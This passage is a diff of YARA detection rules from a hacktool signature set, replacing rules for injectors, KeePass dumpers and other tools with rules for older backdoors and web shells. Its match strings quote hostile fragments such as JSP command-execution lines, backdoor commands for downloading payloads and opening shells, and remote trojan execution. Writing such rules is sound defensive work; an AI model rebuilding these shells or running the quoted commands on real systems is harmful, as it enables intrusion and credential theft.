 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041"
 
 	strings:
-		$x1 = "\\Release\\injector.pdb" ascii
-		$x2 = "Cannot write the shellcode in the process memory, error: " fullword ascii
-		$x3 = "/s shellcode_file PID: shellcode injection." fullword ascii
-		$x4 = "/d dll_file PID: dll injection via LoadLibrary()." fullword ascii
-		$x5 = "/s shellcode_file PID" fullword ascii
-		$x6 = "Shellcode copied in memory: OK" fullword ascii
-		$x7 = "Usage of the injector. " fullword ascii
-		$x8 = "KO: cannot obtain the SeDebug privilege." fullword ascii
+		$s0 = "Not for distribution without the authors permission" fullword wide
+		$s2 = "Utility to split and rejoin files.0" fullword wide
+		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+		$s19 = "SplitJoin" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them ) or 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe_2 : FILE
+rule SIGNATURE_BASE_Editkeylog
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9326bbae-81ee-588e-8581-628b47d348f8"
-		date = "2017-07-07"
+		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3776-L3791"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1891-L1907"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9ca23e4375674ea189d5e9de015f6a1ae16c30d35378580bdc8f42007b716df"
-		score = 75
+		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+		logic_hash = "0efb173598117857c5bf7894f017d655653e843dd0a44439d1b10b7e5c59b248"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b4f3787a19b71c47bc4357a5a77ffb456e2f71fd858079d93e694a6a79f66533"
 
 	strings:
-		$s1 = "\\cmd.exe\" /k wusa c:\\users\\" ascii
-		$s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii
-		$s3 = "Folder Created: " fullword wide
+		$s1 = "Press Any Ke" fullword ascii
+		$s2 = "Enter 1 O" fullword ascii
+		$s3 = "Bon >0 & <65535L" fullword ascii
+		$s4 = "--Choose " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Shellcodegenerator : FILE
+rule SIGNATURE_BASE_Passsniffer
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "49250cbe-7bbd-5462-9324-1a8f350386f3"
-		date = "2017-07-07"
+		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3793-L3806"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1909-L1927"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b267a816871c30e9403805b942be25ed8e28ad2fd946f234f6877a65420754d8"
-		score = 75
+		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+		logic_hash = "771b45473c48618c43c6be84dd37b2ccb23643f1674d437763cb78ce560067c0"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55c4073bf8d38df7d392aebf9aed2304109d92229971ffac6e1c448986a87916"
 
 	strings:
-		$x1 = "\\Release\\shellcodegenerator.pdb" ascii
+		$s2 = "Sniff" fullword ascii
+		$s3 = "GetLas" fullword ascii
+		$s4 = "VersionExA" fullword ascii
+		$s10 = " Only RuntUZ" fullword ascii
+		$s12 = "emcpysetprintf\\" ascii
+		$s13 = "WSFtartup" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Securityxploded_Producer_String : FILE
+rule SIGNATURE_BASE_Aspfile2
 {
 	meta:
-		description = "Detects hacktools by SecurityXploded"
+		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "739c4ba1-5126-51cc-a2dd-cdac2737e29a"
-		date = "2017-07-13"
+		id = "42bbcc16-a6d7-53d7-8651-1a28c6b26ee8"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "http://securityxploded.com/browser-password-dump.php"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3808-L3822"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1929-L1945"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "101e0b8b8aeb8ed4314bc07139dcc2b40600fde82ff786d15a15c10692f9aa4a"
+		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+		logic_hash = "0fd52e646751b14840f30100382c5171fd001c05110dccb4ac87be9b2c4b6131"
 		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59"
 
 	strings:
-		$x1 = "http://securityxploded.com" fullword ascii
+		$s0 = "response.write \"command completed success!\" " fullword ascii
+		$s1 = "for each co in foditems " fullword ascii
+		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+		$s19 = "<title>Hello! Welcome </title>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Kekeo_Hacktool : FILE
+rule SIGNATURE_BASE_Unpack_Rar_Folder_Injectt
 {
 	meta:
-		description = "Detects Kekeo Hacktool"
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4158da8-fc4d-5dc6-b44c-f5325b3bb8ca"
-		date = "2017-07-21"
+		id = "cc7d1a36-1214-5a14-8589-9eb2339a8700"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/gentilkiwi/kekeo/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3834-L3849"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1947-L1970"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14283064e7c8fcee9cde206d25b43b02876a7a4d5de9da6dab47d7f5ba54f019"
-		score = 75
+		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+		logic_hash = "f9d682a9438f49cf8292c33e680537d8c2137b8cba2670430b92d0a620de85b9"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce92c0bcdf63347d84824a02b7a448cf49dd9f44db2d02722d01c72556a2b767"
-		hash2 = "49d7fec5feff20b3b57b26faccd50bc05c71f1dddf5800eb4abaca14b83bba8c"
 
 	strings:
-		$x1 = "[ticket %u] session Key is NULL, maybe a TGT without enough rights when WCE dumped it." fullword wide
-		$x2 = "ERROR kuhl_m_smb_time ; Invalid! Command: %02x - Status: %08x" fullword wide
+		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
+		$s1 = "Explorer.exe" fullword ascii
+		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
+		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
+		$s4 = "The Port Is Out Of Range" fullword ascii
+		$s7 = "Fail To Set The Port" fullword ascii
+		$s11 = "\\psapi.dll" ascii
+		$s20 = "TInject.Dll" fullword ascii
+		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+		$x2 = "injectt.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) ) )
+		(1 of ( $x* ) ) and ( 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Allthethings : FILE
+rule SIGNATURE_BASE_Jc_Wineggdrop_Shell
 {
 	meta:
-		description = "Detects AllTheThings"
+		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3169ca7-3482-5d55-a1d9-6d1c01349922"
-		date = "2017-07-27"
-		modified = "2022-12-21"
-		reference = "https://github.com/subTee/AllTheThings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3861-L3880"
+		id = "219df3a1-fe1c-5d33-ab3e-1b3cbd104c9e"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1972-L1991"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d6b961afb98cfaefe930a7bc246b3f087469b752a8d4abb62b2826418fdfd53"
-		score = 75
+		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+		logic_hash = "af43980b4052cef56884e9d6bdbb12919f1a86420a3f189e30fba624ab37a420"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5a0e9a9ce00d843ea95bd5333b6ab50cc5b1dbea648cc819cfe48482513ce842"
 
 	strings:
-		$x1 = "\\obj\\Debug\\AllTheThings.pdb" ascii
-		$x2 = "AllTheThings.exe" fullword wide
-		$x3 = "\\AllTheThings.dll" ascii
-		$x4 = "Hello From Main...I Don't Do Anything" fullword wide
-		$x5 = "I am a basic COM Object" fullword wide
-		$x6 = "I shouldn't really execute either." fullword wide
+		$s0 = "Sniffer.dll" fullword ascii
+		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
+		$s5 = "Fport.exe or mport.exe " fullword ascii
+		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+		$s15 = ": Del www.exe                   " fullword ascii
+		$s20 = ":Dir *.exe                    " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Keyword : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Asp1
 {
 	meta:
-		description = "Detects Impacket Keyword in Executable"
+		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a92962e6-1b05-583b-8b06-f226bdea88e2"
-		date = "2017-08-04"
+		id = "fa5128c5-efd5-55dd-880a-2952942e2035"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3882-L3899"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1993-L2011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "92a911dc36f8e74ad49ae09ef4dd997b968a2dde46a7500c98983fafb84a086e"
+		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+		logic_hash = "7ce1911d7524e9961f907f863b3966817bcad7a571c933dac6a76e1d8a1eeaf8"
 		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068"
-		hash2 = "2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409"
 
 	strings:
-		$s1 = "impacket.smb(" ascii
-		$s2 = "impacket.ntlm(" ascii
-		$s3 = "impacket.nmb(" ascii
+		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
+		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+		$s15 = "sql=\"select * from scjh\" " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 14000KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Passwordspro : FILE
+rule SIGNATURE_BASE_QQ_Zip_Folder_QQ
 {
 	meta:
-		description = "Auto-generated rule - file PasswordsPro.exe"
+		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c749f883-364e-5f65-9eb8-3dcd74495f7c"
-		date = "2017-08-27"
+		id = "30da6292-f670-5b73-985a-3028e20607be"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "PasswordPro"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3912-L3930"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2013-L2033"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "24887c3a7e4997c9a4e5d3317a5684b0eca7ccc0ffb213660dd9b37bb220f514"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+		logic_hash = "d2517c3646b9a3babfa767c5c57b4b576fda471c190ab66e1054c4de359713ad"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b3d6654e6d9dc49ee1136c0c8e8122cb0d284562447abfdc05dfe38c79f95bf"
 
 	strings:
-		$s1 = "No users marked for attack or all marked users already have passwords found!" fullword ascii
-		$s2 = "%s\\PasswordsPro.ini.Dictionaries(%d)" fullword ascii
-		$s3 = "Passwords processed since attack start:" fullword ascii
+		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s4 = "QQ2000b.exe" fullword wide
+		$s5 = "haoq@neusoft.com" fullword ascii
+		$s9 = "QQ2000b.exe" fullword ascii
+		$s10 = "\\qq2000b.exe" ascii
+		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+		$s17 = "SOFTWARE\\HAOQIANG\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		5 of them
 }
-
-rule SIGNATURE_BASE_Passwordpro_NTLM_DLL : FILE
+rule SIGNATURE_BASE_Unpack_Rar_Folder_Tback
 {
 	meta:
-		description = "Auto-generated rule - file NTLM.dll"
+		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc86b868-000f-56b1-91cd-4aa8caace1df"
-		date = "2017-08-27"
+		id = "f672f987-0d43-53df-8338-084907b6da16"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "PasswordPro"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3932-L3950"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2035-L2063"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1021fe1a4c7a237d7a7cfcb1db8fa5e6fa640d3dd9f14ed37910a6b847717d36"
-		score = 75
+		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+		logic_hash = "89f978742ab952b727a9a8dbab0cd88cfc07440e8c4f974dcfa14ed630083761"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47d4755d31bb96147e6230d8ea1ecc3065da8e557e8176435ccbcaea16fe50de"
 
 	strings:
-		$s1 = "NTLM.dll" fullword ascii
-		$s2 = "Algorithm: NTLM" fullword ascii
+		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
+		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
+		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
+		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
+		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
+		$s8 = "Shell                                 -->Get A Shell" fullword ascii
+		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
+		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
+		$s13 = "Online                                -->List All Connected IP" fullword ascii
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
+		$s19 = "Reboot                                -->Reboot The System" fullword ascii
+		$s20 = "Password Sniffering Is Not Running" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and pe.exports ( "GetHash" ) and pe.exports ( "GetInfo" ) and ( all of them ) )
+		4 of them
 }
-rule SIGNATURE_BASE_Keethief_PS : FILE
+rule SIGNATURE_BASE_Sig_238_Cmd_2
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file KeeThief.ps1"
+		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a54e8d1-3cae-51e8-8da0-024ac25dc6d0"
-		date = "2017-08-29"
+		id = "5fae3c4a-aeeb-5e02-9071-3980a39a19a9"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3962-L3979"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2065-L2082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d3d4ff3b854c5efad99e6f20121b16d5f2f0a31a4c8efd87a937f857923a5e1"
-		score = 75
+		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+		logic_hash = "a794d6b60194a190bd8d549ad00cf90649a52d831fdc7539c68a1f6312609bc2"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a3b976279ded8e64b548c1d487212b46b03aaec02cb6e199ea620bd04b8de42f"
 
 	strings:
-		$x1 = "$WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"" fullword ascii
-		$x2 = "if($KeePassProcess.FileVersion -match '^2\\.') {" fullword ascii
+		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
+		$s1 = "InputStream in = child.getInputStream();" fullword ascii
+		$s2 = "String cmd = request.getParameter(\"" ascii
+		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
+		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 1000KB and ( 1 of ( $x* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Keetheft_EXE : FILE
+rule SIGNATURE_BASE_Rangescan
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file KeeTheft.exe"
+		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65531239-c5fa-5285-8f44-2d858e211c9b"
-		date = "2017-08-29"
+		id = "143d9e1e-41e2-579a-beee-30da2cf068f7"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3981-L4000"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2084-L2101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a6019248ad9708b1508fdf77a2ecbe92a7e8aac916fbca88aec117abeb07b9a0"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+		logic_hash = "f334a59c2d95505807df642a8d5605b1b7d8b3385a552e8f5a37f344d7a75412"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f06789c3e9fe93c165889799608e59dda6b10331b931601c2b5ae06ede41dc22"
 
 	strings:
-		$x1 = "Error: Could not create a thread for the shellcode" fullword wide
-		$x2 = "Could not find address marker in shellcode" fullword wide
-		$x3 = "GenerateDecryptionShellCode" fullword ascii
-		$x4 = "KeePassLib.Keys.KcpPassword" fullword wide
-		$x5 = "************ Found a CompositeKey! **********" fullword wide
-		$x6 = "*** Interesting... there are multiple .NET runtimes loaded in KeePass" fullword wide
-		$x7 = "GetKcpPasswordInfo" fullword ascii
+		$s0 = "RangeScan.EXE" fullword wide
+		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+		$s9 = "Produced by isn0" fullword ascii
+		$s10 = "RangeScan" fullword wide
+		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Keetheft_Out_Shellcode : FILE
+rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Readme
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file Out-Shellcode.ps1"
+		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1263ad5d-5d50-50e6-ad78-9d5e4e16634b"
-		date = "2017-08-29"
+		id = "cee0f8c3-f947-50a5-ae8c-4ce83ef5e433"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4002-L4016"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2103-L2117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d536edf1a40defc3b3aa7ce8e595c53e7dd3b7f1daea772c13319ee5bf7675e"
-		score = 75
+		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+		logic_hash = "38d69eee78ff8fa2ad064871481bd1b8a926146922952c7e199d27c809d0c980"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2afb1c8c82363a0ae43cad9d448dd20bb7d2762aa5ed3672cd8e14dee568e16b"
 
 	strings:
-		$x1 = "Write-Host \"Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))\"" fullword ascii
-		$x2 = "$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\\.text\\W+CODE' })[0]" fullword ascii
+		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+		$s20 = "XYZCmd V1.0" fullword ascii
 
 	condition:
-		( filesize < 2KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Sharpire : FILE
+rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Inject
 {
 	meta:
-		description = "Auto-generated rule - file Sharpire.exe"
+		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "747f2798-4f93-5073-b358-969060a1c937"
-		date = "2017-09-23"
-		modified = "2022-12-21"
-		reference = "https://github.com/0xbadjuju/Sharpire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4026-L4049"
+		id = "bb31dc53-f3c1-5f8b-84f9-c231a4e1675b"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2119-L2134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1437b4c5229761bcc18d97ea6328866f4b9c763461fa6ecb5c18e6f3961c3114"
-		score = 75
-		quality = 83
-		tags = "FILE"
+		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+		logic_hash = "6350e11097bc2bb8fb0fbecf6be463aeaf39ad4169d2dd06a57577bf02b515f8"
+		score = 60
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "327a1dc2876cd9d7f6a5b3777373087296fc809d466e42861adcf09986c6e587"
 
 	strings:
-		$x1 = "\\obj\\Debug\\Sharpire.pdb" ascii
-		$x2 = "[*] Upload of $fileName successful" fullword wide
-		$s1 = "no shell command supplied" fullword wide
-		$s2 = "/login/process.php" fullword wide
-		$s3 = "invokeShellCommand" fullword ascii
-		$s4 = "..Command execution completed." fullword wide
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
-		$s6 = "/admin/get.php" fullword wide
-		$s7 = "[!] Error in stopping job: " fullword wide
+		$s6 = "Fail To Inject" fullword ascii
+		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+		$s11 = " Successfully" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) and 3 of them ) )
+		all of them
 }
-rule SIGNATURE_BASE_Invoke_Metasploit : FILE
+rule SIGNATURE_BASE_Sig_238_Sqlcmd
 {
 	meta:
-		description = "Detects Invoke-Metasploit Payload"
+		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40452884-df3f-5b49-ad10-05006cb115f2"
-		date = "2017-09-23"
+		id = "0efdfac7-5a89-5251-b583-12b0a58c48ff"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1"
